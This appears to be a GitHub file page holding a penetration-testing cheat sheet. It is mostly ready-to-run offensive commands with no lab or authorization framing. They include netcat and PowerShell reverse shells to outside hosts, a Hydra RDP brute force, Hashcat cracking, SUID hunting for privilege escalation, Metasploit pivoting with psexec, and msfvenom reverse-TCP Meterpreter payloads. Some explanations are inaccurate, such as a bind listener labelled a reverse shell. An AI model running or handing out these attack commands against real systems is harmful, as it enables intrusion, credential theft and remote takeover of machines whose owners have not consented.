-
Notifications
You must be signed in to change notification settings - Fork 0
/
WEB PENSTING
380 lines (291 loc) · 14.1 KB
/
WEB PENSTING
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
Section 1: Hashcat Password Cracking
Hashcat is a powerful password cracking tool used to recover passwords from hash values. In this section, we will explore how to use Hashcat to crack passwords.
The command to run Hashcat for Windows hash dumping is as follows:
```
hashcat -m 400 -a 0 hash /usr/share/wordlists/rockyou.txt.
```
This command uses the rockyou.txt wordlist to crack the passwords from the provided hash.
Section 2: Netcat Examples
Netcat, also known as "nc," is a versatile networking utility that can be used for various purposes, including port scanning, banner grabbing, and creating reverse shells. Let's explore a few Netcat examples:
Example 1: Basic Netcat Listener
```
nc -l -p 31337
```
This command sets up a basic Netcat listener on port 31337, waiting for incoming connections.
Example 2: Reverse Shell with Netcat
```
nc -Lp 31337 -vv -e cmd.exe
```
This command sets up a Netcat listener on port 31337 and executes a command shell (cmd.exe) upon connection.
Section 3: Banner Grabbing with Netcat
Banner grabbing is the process of retrieving information about a target system by examining its network banners. Netcat can be used for banner grabbing by sending specific requests to a target host. Here's an example:
```
nc 192.168.0.10 80
GET / HTTP/1.1
Host: 192.168.0.10
User-Agent: Mozilla/4.0
Referrer: www.example.com
<enter>
<enter>
```
This command establishes a connection to the target IP on port 80 and sends an HTTP request to retrieve the homepage. Adjust the request according to the target's protocol and specific information you want to gather.
Section 4: Windows Reverse Shell
A reverse shell allows an attacker to gain command execution on a remote system by establishing a connection from the target system back to the attacker's machine. Here are two examples of setting up a Windows reverse shell:
Example 1: Using Netcat
```
nc example.com 80 -e cmd.exe
```
This command connects to "example.com" on port 80 and executes a command shell (cmd.exe) on the target system.
Example 2: Using PowerShell
```
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.0.10', 31337);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
```
This PowerShell command establishes a TCP connection to the specified IP and port and opens a command shell on the target machine.
Section 5: Finding SUID/SGID Root Files
SUID (Set User ID) and SGID (Set Group ID) are permissions that can be set on files to allow them to be executed with the privileges of the file owner or group, respectively. Finding such files can be valuable for privilege escalation. Here are commands to find SUID and SGID root files:
Find SUID root files:
```
find / -user root -perm -4000 -print
```
This command searches for files owned by the root user with the SUID permission set and prints their paths.
Find SGID root files:
```
find / -group root -perm -2000 -print
```
This command searches for files owned by the root group with the SGID permission set and prints their paths.
Find SUID and SGID files owned by anyone:
```
find / -perm -4000 -o -perm -2000 -print
```
This command searches for files with either SUID or SGID permissions set, regardless of the owner or group, and prints their paths.
Find files that are not owned by any user:
```
find / -nouser -print
```
This command searches for files that do not have an associated user and prints their paths.
Find files that are not owned by any group:
```
find / -nogroup -print
```
This command searches for files that do not have an associated group and prints their paths.
Find symlinks and what they point to:
```
find / -type l -ls
```
This command searches for symbolic links and prints their information along with the target they point to.
Section 6: Python Shell
Python provides an interactive shell that allows you to execute Python code and interact with the system. Here's an example of spawning a Python shell:
```
python -c 'import pty; pty.spawn("/bin/bash")'
```
This command spawns an interactive shell using Python's `pty` module and executes the `/bin/bash` shell.
Section 7: Python/Ruby/PHP HTTP Server
Python, Ruby, and PHP can be used to create simple HTTP servers for hosting files or serving web content locally. Here are commands to start HTTP servers using these languages:
Python 2 HTTP server:
```
python2 -m SimpleHTTPServer
```
This command starts an HTTP server on port 8000 using Python 2. You can access files in the current directory using a web browser or `curl`.
Python 3 HTTP server:
```
python3 -m http.server
```
This command starts an HTTP server on port 8000 using Python 3.
Ruby HTTP server:
```
ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 8888, :DocumentRoot => Dir.pwd).start"
```
This command starts an HTTP server on port 8888 using Ruby. It serves files from the current directory.
PHP HTTP server:
```
php -S 0.0.0.0:8888
```
This command starts an HTTP server on port 8888 using PHP. It serves files from the current directory.
Section 8: Getting PIDs of Processes
In some situations, you may need to identify the process IDs (PIDs) of running processes. Here are commands to retrieve the PIDs of processes:
Get PIDs of processes using a specific port (e.g., port 80):
```
fuser -nv tcp 80
```
This command displays the PIDs of processes using the specified TCP port (in this case, port 80).
Kill processes using a specific port (e.g., port 80):
```
fuser -k -n tcp 80
```
This command terminates the processes using the specified TCP port (in this case, port 80).
Section 9: Hydra RDP Bruteforce
Hydra is a powerful tool for performing brute-force attacks on various protocols. Here's an example of using Hydra to perform an RDP (Remote Desktop Protocol) brute-force attack:
```
hydra -l admin -P /root/Desktop/passwords -S X.X.X.X rdp
```
This command attempts to brute-force the RDP server with the IP address X.X.X.X using the username "admin" and a list of passwords located at `/root/Desktop/passwords`. Adjust the username, password file path, and target IP address according to your specific scenario.
Section 10: Mount Remote Windows Share
To mount a remote Windows share on a Linux system, you can use the `smbmount` command. Here's an example:
```
smbmount //X.X.X.X/c$ /mnt/remote/ -o username=user,password=pass,rw
```
This command mounts the `C$` share on the remote Windows system with the IP address X.X.X.X to the `/mnt/remote/` directory on your Linux system. Replace `X.X.X.X` with the actual IP address, and adjust the username and password according to your authentication requirements.
Section 11: Compiling Exploit in Kali
When working with exploits, you may need to compile them before executing. Here are commands to compile exploits in Kali Linux:
Compile a 32-bit exploit:
```
gcc -m32 -o output32 hello.c
```
This command compiles the `hello.c` exploit code into a 32-bit executable named `output32`.
Compile a 64-bit exploit:
```
gcc -m64 -o output hello.c
```
This command compiles the `hello.c` exploit code into a 64-bit executable named `output`.
Section 12: Compiling Windows Exploits on Kali
If you're using Kali Linux and want to compile Windows exploits, you can utilize the MinGW toolchain. Here's an example:
```
wget -O mingw-get-setup.exe http://sourceforge.net/projects/mingw/files/Installer/mingw-get-setup.exe/download
wine mingw-get-setup.exe
```
These commands download and install the MinGW toolchain.
After installation, you can compile Windows exploits using the MinGW `gcc` compiler. Here's an example:
```
cd /root/.wine/drive_c/windows
wget http://gojhonny.com/misc/mingw_bin.zip && unzip mingw_bin.zip
cd /root/.wine/drive_c/MinGW/bin
wine gcc -o ability.exe /tmp/exploit.c -lwsock32
wine ability.exe
```
These commands navigate to the MinGW bin directory, download the necessary files, and compile the `exploit.c` file into an executable named `ability.exe`. Finally, the executable is executed using Wine.
Section 13: NASM Commands
NASM (Netwide Assembler) is a popular assembler used in assembly language programming. Here are some common NASM commands:
Assemble assembly code into a binary file:
```
nasm -f bin -o payload.bin payload.asm
```
This command assembles the `payload.asm` assembly code into a binary file named `payload.bin`.
Assemble assembly code into an ELF (Executable and Linkable Format) object file:
```
nasm -f elf payload.asm; ld -o payload payload.o; objdump -d payload
```
These commands assemble the `payload.asm` assembly code into an ELF object file named `payload.o`, link it using `ld` into an executable named `payload`, and then display the disassembly using `objdump`.
Section 14: SSH Pivoting
SSH pivoting allows you to establish a tunnel through an intermediate SSH server to reach a target system that is not directly accessible. Here's how you can use SSH pivoting:
1. SSH Dynamic Port Forwarding:
```
ssh -D 127.0.0.1:1080 -p 22 user@IP
```
This command establishes a dynamic port forwarding tunnel, creating a SOCKS proxy on your local machine at `127.0.0.1:1080`. Replace `user` with your SSH username and `IP` with the IP address or hostname of the SSH server.
2. Configure ProxyChains:
Edit the `/etc/proxychains.conf` file and add the following line at the end:
```
socks4 127.0.0.1 1080
```
This configures ProxyChains to use the SOCKS proxy on `127.0.0.1:1080`.
3. Using ProxyChains:
You can now use ProxyChains to route your network traffic through the SSH tunnel. For example, to execute a command `target` through the SSH tunnel:
```
proxychains target
```
Section 15: SSH Pivoting from One Network to Another
If you need to perform SSH pivoting from one network to another, here's how you can achieve it:
1. Set up the first SSH tunnel:
```
ssh -D 127.0.0.1:1080 -p 22 user1@IP1
```
This command establishes a dynamic port forwarding tunnel to the first SSH server.
2. Configure ProxyChains for the first SSH tunnel:
Edit the `/etc/proxychains.conf` file and add the following line at the end:
```
socks4 127.0.0.1 1080
```
3. Set up the second SSH tunnel:
```
proxychains ssh -D 127.0.0.1:1081 -p 22 user1@IP2
```
This command establishes a dynamic port forwarding tunnel from the first SSH tunnel to the second SSH server.
4. Configure ProxyChains for the second SSH tunnel:
Edit the `/etc/proxychains.conf` file and add the following line at the end:
```
socks4 127.0.0.1 1081
```
5. Using ProxyChains to access the target system:
You can now route your network traffic through both SSH tunnels. For example, to execute a command `target` through the SSH tunnels:
```
proxychains target
```
Section 16: Pivoting Using Metasploit
Metasploit Framework provides modules for pivoting through compromised hosts. Here's an example of using Metasploit for pivoting:
1. Obtain a Meterpreter session on the compromised host:
```
# Start by establishing a Meterpreter session on the compromised host using any applicable exploit.
```
2. Configure routing in Meterpreter:
```
meterpreter > ipconfig
```
Note the IP address of the compromised host (e.g., `10.1.13.3`).
```
meterpreter > run autoroute -s 10.1.13.0/24
```
This command adds a route to the target network through the compromised host.
```
meterpreter > run autoroute -p
```
This command displays the configured routes.
3. Background the Meterpreter session:
```
meterpreter > Ctrl+Z
```
4. Exploit the target system:
```
msf auxiliary(tcp) > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 10.1.13.2
msf exploit(psexec) > exploit
```
This exploits the target system through the compromised host and establishes a Meterpreter session on the target.
5. Obtain the IP address of the target system:
```
meterpreter > ipconfig
```
Note the IP address of the target system (e.g., `10.1.13.2`).
You can now use the established Meterpreter session on the target system for further exploitation.
Section 17: Exploit-DB Search Using CSV File
Exploit-DB is a popular online database of exploits. You can use it to search for specific exploits based on various criteria. Here's an example of searching Exploit-DB using a CSV file:
1. Clone the Exploit-DB repository:
```
git clone https://github.com/offensive-security/exploit-database.git
cd exploit-database
```
2. Update the Exploit-DB:
```
./searchsploit –u
```
3. Perform a search:
```
./searchsploit apache 2.2
```
This command searches for exploits related to Apache 2.2.
```
./searchsploit "Linux Kernel"
```
This command searches for exploits related to the Linux Kernel.
You can customize the search by combining multiple search terms, filtering by specific criteria, and more.
Section 18: MSF Payloads
Metasploit Framework (MSF) provides a variety of payloads that can be used during penetration testing and exploit development. Here are some examples:
Generate a Windows Meterpreter reverse TCP payload:
```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> X > system.exe
```
This command generates a Windows executable named `system.exe` with a reverse TCP Meterpreter payload. Replace `<IP Address>` with your IP address.
Generate a PHP Meterpreter reverse TCP payload:
```
msfvenom -p php/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 R > exploit.php
```
This command generates a PHP file named `exploit.php` with a reverse TCP Meterpreter payload. Replace `<IP Address>` with your IP address.
Generate a Windows Meterpreter reverse TCP payload in ASP format:
```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -e -a x86 --platform win -f asp -o file.asp
```
This command generates an ASP file named `file.asp` with a reverse TCP Meterpreter payload for Windows. Replace `<IP Address>` with your IP address.
Generate a Windows Meterpreter reverse TCP payload in C format:
```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -e x86/shikata_ga_nai -b "\x00" -a x86 --platform win -f c
```
This command generates C code with a reverse TCP Meterpreter payload for Windows. Replace `<IP Address>` with your IP address.